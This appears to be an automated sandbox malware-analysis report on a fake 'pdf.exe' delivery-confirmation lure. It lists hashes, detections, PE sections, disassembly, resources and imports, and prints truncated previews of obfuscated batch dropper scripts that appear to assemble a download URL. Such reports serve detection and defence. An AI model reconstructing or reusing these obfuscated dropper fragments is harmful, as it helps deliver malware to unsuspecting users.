                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................,.............@..........................P...................@...........................p...*...@..........................H|...................................................w...............................text............................... ..`.itext..t........................... ..`.data...............................@....bss.....7...0...........................idata...*...p...,..................@....tls....4............@...................rdata...............@..............@..@.reloc..H|.......~...B..............@..B.rsrc........@......................@..@.............P......................@..@................................................................................................
                                                                Process:C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe
                                                                File Type:DOS batch file, Unicode text, UTF-8 text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):8556
                                                                Entropy (8bit):4.623706637784657
                                                                Encrypted:false
                                                                SSDEEP:192:dSSQx41VVrTlS2owuuWTtkY16Wdhdsu0mYKDCIfYaYuX1fcDuy:Vrhgwuua5vdnQaCIVJF6uy
                                                                MD5:60CD0BE570DECD49E4798554639A05AE
                                                                SHA1:BD7BED69D9AB9A20B5263D74921C453F38477BCB
                                                                SHA-256:CA6A6C849496453990BECEEF8C192D90908C0C615FA0A1D01BCD464BAD6966A5
                                                                SHA-512:AB3DBDB4ED95A0CB4072B23DD241149F48ECFF8A69F16D81648E825D9D81A55954E5DD9BC46D3D7408421DF30C901B9AD1385D1E70793FA8D715C86C9E800C57
                                                                Malicious:true
                                                                Preview:@echo off..set "MJtc=Iet "..@%.r.......%e%...%c%...r....%h%.....%o%........% % .....%o%...%f%.o.%f%......%..s%.......%e%.%t%.. .....% %.rr.. .%"%...%w%......%o%...o..%t%r.....%c%....%=%... . .%s%...... %e%....%t%....% %........ %"% o...%..%wotc%"%.%n% r .%O%...%P%.. ..%t%.%=%...... o..%=%......%"%....r...%..%wotc%"aeeYdDdanR%nOPt%s://"..%wotc%"%..........%a%.%e%......%e%.r..%Y%..%d%.....r....%D%.. %d% ... .%a%.. ...%n%.. ..%R%........%%nOPt%s%...... .%:%.. %/%....%/%r......%"%.....r.%..%wotc%"%...... ...%U%.o..%g%.r.%
                                                                Process:C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe
                                                                File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (420), with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):46543
                                                                Entropy (8bit):4.705001079878445
                                                                Encrypted:false
                                                                SSDEEP:768:Ud6T6yIssKMyD/LgZ0+9Z2noufIBUEADZQp2H8ZLq:UdQFIssKMyjL4X2T8UbZT
                                                                MD5:637A66953F03B084808934ED7DF7192F
                                                                SHA1:D3AE40DFF4894972A141A631900BD3BB8C441696
                                                                SHA-256:41E1F89A5F96F94C2C021FBC08EA1A10EA30DAEA62492F46A7F763385F95EC20
                                                                SHA-512:2A0FEDD85722A2701D57AA751D5ACAA36BBD31778E5D2B51A5A1B21A687B9261F4685FD12E894244EA80B194C76E722B13433AD9B649625D2BC2DB4365991EA3
                                                                Malicious:false
                                                                Preview:@echo off..set "EPD=sPDet "..@%...... or%e%.........%c%......%h%.........o%o%.or......% %.o.ro...%o%.%f%...r.....%f%....r....%..s%. %e%.....%t% % % rrr....%"%.....%E%....%J%.. ....%O%.%h% .......%=%........%s%.. ..%e%....%t%....% %...o...%"%.%..%EJOh%"%.%r% %H%..%C%........%N%....o ....%=%..........%=% .%"%..%..%EJOh%"%.....%K%.%z%..r%j%........%L%..%c%. o.......%f%. o..%x%.%X%.........r%V%.%J%.....%%rHCN%k%.... ...%"%........%..%EJOh%"%.o.....%a%or%g%..o.... ..%u% ..%P%.....o...%X%.. .......%c% .....%U%.%I%. .
                                                                Process:C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe
                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):175800
                                                                Entropy (8bit):6.631791793070417
                                                                Encrypted:false
                                                                SSDEEP:3072:qjyOm0e6/bIhbuwxlEb1MpG+xUEyAn0fYuDGOpPXFZ7on+gUxloDMq:qjyl6ebX45OG+xUEWfYUGOpPXFZ7on+G
                                                                MD5:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                SHA1:2A001C30BA79A19CEAF6A09C3567C70311760AA4
                                                                SHA-256:BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
                                                                SHA-512:C7F5BAAD732424B975A426867D3D8B5424AA830AA172ED0FF0EF630070BF2B4213750E123A36D8C5A741E22D3999CA1D7E77C62D4B77D6295B20A38114B7843C
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                Joe Sandbox View:
                                                                • Filename: F.O Pump Istek,Docx.bat, Detection: malicious, Browse
                                                                • Filename: D.G Governor Istek,Docx.exe, Detection: malicious, Browse
                                                                • Filename: qDKTsL1y44.exe, Detection: malicious, Browse
                                                                • Filename: PRODUCT.bat, Detection: malicious, Browse
                                                                • Filename: purchaseorder.bat, Detection: malicious, Browse
                                                                • Filename: PO11550.exe, Detection: malicious, Browse
                                                                • Filename: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, Detection: malicious, Browse
                                                                • Filename: PCMNil7wkU.exe, Detection: malicious, Browse
                                                                • Filename: tTIYCp2sf4.exe, Detection: malicious, Browse
                                                                • Filename: Re_Porforma_Invoice_60_downpayment_-_PT_Era_F1909003_Project_Kupang.exe, Detection: malicious, Browse
                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....>.{..................................... ....@.......................... .......c........... ..............................................................H....................................................................................text............................... ..`.data........ ...P..................@....tls.................`..............@....rdata...............b..............@..P.idata... ...........d..............@..@.edata...............|..8...,...@...@..@
                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Entropy (8bit):7.343935115196535
                                                                TrID:
                                                                • Win32 Executable (generic) a (10002005/4) 99.38%
                                                                • InstallShield setup (43055/19) 0.43%
                                                                • Windows Screen Saver (13104/52) 0.13%
                                                                • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                File name:Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe
                                                                File size:1'362'944 bytes
                                                                MD5:72ab2a99902ec6f67b0d4df67820328e
                                                                SHA1:31477040c90aab506547fe4e4450e71b76e9345b
                                                                SHA256:406044ba7e007830321b3669505774b9e282502ac958f0cd723e5106c33c4180
                                                                SHA512:3ff78c68e71f0bc2788f4177d7a49ff5857a71ec42d5e70c786f9cdea3a4b8ed1563fe95beef7501c8b6c85e96e06b63f5e5399575163b50bb6404bdec025cce
                                                                SSDEEP:24576:TS1gzTBokW3THfYl7JTOs1r7FX2DOfqDrKfK8r/4mSwhODqR:TtTiq973f
                                                                TLSH:C555AF17939347B1C4295D7064DE9AB29A14BF20AB74D43A2FD07F4C8F3A94058BBE63
                                                                File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                Icon Hash:132bc3040b0b0b13
                                                                Entrypoint:0x47082c
                                                                Entrypoint Section:.itext
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                DLL Characteristics:
                                                                Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:2e10263a01b85d4d1c064ae3be7c8027
                                                                Instruction
                                                                push ebp
                                                                mov ebp, esp
                                                                add esp, FFFFFFF0h
                                                                mov eax, 0046F39Ch
                                                                call 00007F081D28E3D9h
                                                                mov eax, dword ptr [00472C24h]
                                                                mov eax, dword ptr [eax]
                                                                call 00007F081D2E7B61h
                                                                mov ecx, dword ptr [004729F8h]
                                                                mov eax, dword ptr [00472C24h]
                                                                mov eax, dword ptr [eax]
                                                                mov edx, dword ptr [0046CDDCh]
                                                                call 00007F081D2E7B61h
                                                                mov eax, dword ptr [00472C24h]
                                                                mov eax, dword ptr [eax]
                                                                call 00007F081D2E7BD5h
                                                                call 00007F081D28C0C8h
                                                                lea eax, dword ptr [eax+00h]
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x770000x2a88.idata
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x840000xd0c00.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x7c0000x7c48.reloc
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x7b0000x18.rdata
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x777dc0x69c.idata
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x10000x6e60c0x6e8007f88a60478da2b59059ac9020a731125False0.5148804263291855data6.52663869684443IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .itext0x700000x8740xa001d2f13587195bd07d0eacaf37f6bce18False0.53359375data5.614686748854788IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .data0x710000x1ddc0x1e0064398b74c9b81658dc6c1c0840194ed3False0.40924479166666666data3.912605066546787IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .bss0x730000x37000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .idata0x770000x2a880x2c00e6a0c30232a0c925db3f0b1f9f0c28e7False0.3114346590909091data5.108538589937939IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .tls0x7a0000x340x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .rdata0x7b0000x180x200c82cfd34222b3044514069e79ad6ba11False0.05078125data0.2044881574398449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .reloc0x7c0000x7c480x7e002d8e689e68215d8c5822f613430c661eFalse0.6173735119047619data6.676175097423695IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                .rsrc0x840000xd0c000xd0c00b1ad8e7eedbf18149d318d2606d312d2False0.5735825224550898data7.471427064267704IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                RT_CURSOR0x853340x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                RT_CURSOR0x854680x134dataEnglishUnited States0.4642857142857143
                                                                RT_CURSOR0x8559c0x134dataEnglishUnited States0.4805194805194805
                                                                RT_CURSOR0x856d00x134dataEnglishUnited States0.38311688311688313
                                                                RT_CURSOR0x858040x134dataEnglishUnited States0.36038961038961037
                                                                RT_CURSOR0x859380x134dataEnglishUnited States0.4090909090909091
                                                                RT_CURSOR0x85a6c0x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                RT_BITMAP0x85ba00x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                RT_BITMAP0x85d700x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 380EnglishUnited States0.46487603305785125
                                                                RT_BITMAP0x85f540x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                RT_BITMAP0x861240x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39870689655172414
                                                                RT_BITMAP0x862f40x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.4245689655172414
                                                                RT_BITMAP0x864c40x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5021551724137931
                                                                RT_BITMAP0x866940x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5064655172413793
                                                                RT_BITMAP0x868640x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                RT_BITMAP0x86a340x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5344827586206896
                                                                RT_BITMAP0x86c040x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                RT_BITMAP0x86dd40x7dab0Device independent bitmap graphic, 942 x 182 x 24, image size 514696EnglishUnited States0.6317840601784216
                                                                RT_BITMAP0x1048840x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.39864864864864863
                                                                RT_BITMAP0x1049ac0x128Device independent bitmap graphic, 19 x 16 x 4, image size 192EnglishUnited States0.3885135135135135
                                                                RT_BITMAP0x104ad40x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.3885135135135135
                                                                RT_BITMAP0x104bfc0xe8Device independent bitmap graphic, 13 x 16 x 4, image size 128EnglishUnited States0.36637931034482757
                                                                RT_BITMAP0x104ce40x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States0.3614864864864865
                                                                RT_BITMAP0x104e0c0x128Device independent bitmap graphic, 20 x 16 x 4, image size 192EnglishUnited States0.3783783783783784
                                                                RT_BITMAP0x104f340xd0Device independent bitmap graphic, 13 x 13 x 4, image size 104EnglishUnited States0.49038461538461536
                                                                RT_BITMAP0x1050040x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.3716216216216216
                                                                RT_BITMAP0x10512c0x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States0.2905405405405405
                                                                RT_BITMAP0x1052540x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.38175675675675674
                                                                RT_BITMAP0x10537c0x128Device independent bitmap graphic, 19 x 16 x 4, image size 192EnglishUnited States0.3783783783783784
                                                                RT_BITMAP0x1054a40x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.3783783783783784
                                                                RT_BITMAP0x1055cc0xe8Device independent bitmap graphic, 12 x 16 x 4, image size 128EnglishUnited States0.3620689655172414
                                                                RT_BITMAP0x1056b40x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States0.3581081081081081
                                                                RT_BITMAP0x1057dc0x128Device independent bitmap graphic, 20 x 16 x 4, image size 192EnglishUnited States0.375
                                                                RT_BITMAP0x1059040xd0Device independent bitmap graphic, 13 x 13 x 4, image size 104EnglishUnited States0.47115384615384615
                                                                RT_BITMAP0x1059d40x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.36824324324324326
                                                                RT_BITMAP0x105afc0x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States0.28716216216216217
                                                                RT_BITMAP0x105c240x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.3885135135135135
                                                                RT_BITMAP0x105d4c0x128Device independent bitmap graphic, 19 x 16 x 4, image size 192EnglishUnited States0.375
                                                                RT_BITMAP0x105e740x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.375
                                                                RT_BITMAP0x105f9c0xe8Device independent bitmap graphic, 13 x 16 x 4, image size 128EnglishUnited States0.36637931034482757
                                                                RT_BITMAP0x1060840x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States0.35135135135135137
                                                                RT_BITMAP0x1061ac0x128Device independent bitmap graphic, 20 x 16 x 4, image size 192EnglishUnited States0.36486486486486486
                                                                RT_BITMAP0x1062d40xd0Device independent bitmap graphic, 13 x 13 x 4, image size 104EnglishUnited States0.47115384615384615
                                                                RT_BITMAP0x1063a40x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.3581081081081081
                                                                RT_BITMAP0x1064cc0x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States0.28716216216216217
                                                                RT_BITMAP0x1065f40xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.4870689655172414
                                                                RT_ICON0x1066dc0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 1889 x 1889 px/m0.30230496453900707
                                                                RT_ICON0x106b440x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 1889 x 1889 px/m0.1942622950819672
                                                                RT_ICON0x1074cc0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 1889 x 1889 px/m0.1676829268292683
                                                                RT_ICON0x1085740x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 1889 x 1889 px/m0.11058091286307054
                                                                RT_ICON0x10ab1c0x178bPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9465737514518002
                                                                RT_DIALOG0x10c2a80x52data0.7682926829268293
                                                                RT_DIALOG0x10c2fc0x52data0.7560975609756098
                                                                RT_STRING0x10c3500x160data0.4460227272727273
                                                                RT_STRING0x10c4b00x38cTarga image data - Color 99 x 107 x 32 +68 +111 "z"0.44162995594713655
                                                                RT_STRING0x10c83c0x1ccdata0.558695652173913
                                                                RT_STRING0x10ca080xccdata0.6764705882352942
                                                                RT_STRING0x10cad40x114data0.6086956521739131
                                                                RT_STRING0x10cbe80x350data0.43514150943396224
                                                                RT_STRING0x10cf380x3bcdata0.3817991631799163
                                                                RT_STRING0x10d2f40x370data0.4022727272727273
                                                                RT_STRING0x10d6640x3ccdata0.33539094650205764
                                                                RT_STRING0x10da300x214data0.49624060150375937
                                                                RT_STRING0x10dc440xccdata0.6274509803921569
                                                                RT_STRING0x10dd100x194data0.5643564356435643
                                                                RT_STRING0x10dea40x3c4data0.3288381742738589
                                                                RT_STRING0x10e2680x338data0.42961165048543687
                                                                RT_STRING0x10e5a00x294data0.42424242424242425
                                                                RT_RCDATA0x10e8340x10data1.5
                                                                RT_RCDATA0x10e8440x340data0.6899038461538461
                                                                RT_RCDATA0x10eb840x35b08GIF image data, version 89a, 600 x 300EnglishUnited States0.6346856924588017
                                                                RT_RCDATA0x14468c0x10463Delphi compiled form 'TfMain'0.12409427084114673
                                                                RT_GROUP_CURSOR0x154af00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                RT_GROUP_CURSOR0x154b040x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                RT_GROUP_CURSOR0x154b180x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                RT_GROUP_CURSOR0x154b2c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                RT_GROUP_CURSOR0x154b400x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                RT_GROUP_CURSOR0x154b540x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                RT_GROUP_CURSOR0x154b680x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                RT_GROUP_ICON0x154b7c0x4cdata0.8289473684210527
                                                                DLLImport
                                                                oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                user32.dllGetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
                                                                kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                                                kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                user32.dllCreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessageTime, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextExA, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetMapMode, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SetArcDirection, SelectPalette, SelectObject, SelectClipRgn, SaveDC, RoundRect, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, PlayEnhMetaFile, Pie, PatBlt, MoveToEx, MaskBlt, LineTo, LPtoDP, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionA, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, FrameRgn, FillRgn, ExcludeClipRect, Ellipse, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreateRectRgnIndirect, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateEnhMetaFileA, CreateEllipticRgnIndirect, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, CombineRgn, CloseEnhMetaFile, BitBlt
                                                                version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                kernel32.dlllstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtectEx, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, QueryDosDeviceA, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalSize, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVolumeInformationA, GetVersionExA, GetVersion, GetUserDefaultLCID, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDriveTypeA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                                                advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
                                                                oleaut32.dllGetErrorInfo, SysFreeString
                                                                ole32.dllCreateStreamOnHGlobal, IsAccelerator, OleDraw, OleSetMenuDescriptor, CoCreateInstance, CoGetClassObject, CoUninitialize, CoInitialize, IsEqualGUID
                                                                kernel32.dllSleep
                                                                oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
